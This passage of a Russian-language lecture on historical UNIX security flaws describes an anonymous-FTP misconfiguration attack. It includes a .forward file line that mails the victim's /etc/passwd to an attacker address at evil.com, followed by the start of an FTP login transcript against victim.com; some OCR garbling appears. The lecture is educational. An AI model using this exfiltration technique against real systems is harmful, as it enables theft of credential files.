Лекция: Которые характеризуют те или иные принципиальные проблемы безопасности UNIX. Почти все атаки

даются с подробными листингами, так как потенциальный кракер все равно найдет их в Internet [22], а

Главное — на сегодняшний день они являются сильно устаревшими и представляют в большей степени

Теоретический интерес.

Атака с использованием анонимного ftp

Анонимный ftp-сервис (обнаружить его чрезвычайно просто) мог служить легким способом получения

Доступа из-за частой неправильной конфигурации. Например, система могла иметь полную копию файла

/etc/passwd в каталоге -ftp/etc вместо урезанной версии со всеми вытекающими отсюда последствиями.

Кроме того, можно было применить и более изощренный способ — в следующем примере домашний каталог

Специального пользователя ftp на victim.com доступен для записи. Это позволяет послать по почте самому

себе файл /etc/passwd атакуемой машины. Для этого надо создать файл .forward в домашнем каталоге ftp,

который выполняется, когда пользователю ftp посылается почта. Например:

evil % cat forward_sucker_file

«I/bin/mail hacker@)evil .corn < /etc/passwd»

evil % ftp victim.com

Connected to victim.com

Victim FTP server ready.

Name (victim.com:hacker): ftp

Guest login ok, send ident as password.

Password: *****

Guest login ok, access restrictions apply.

ftp> Is -lga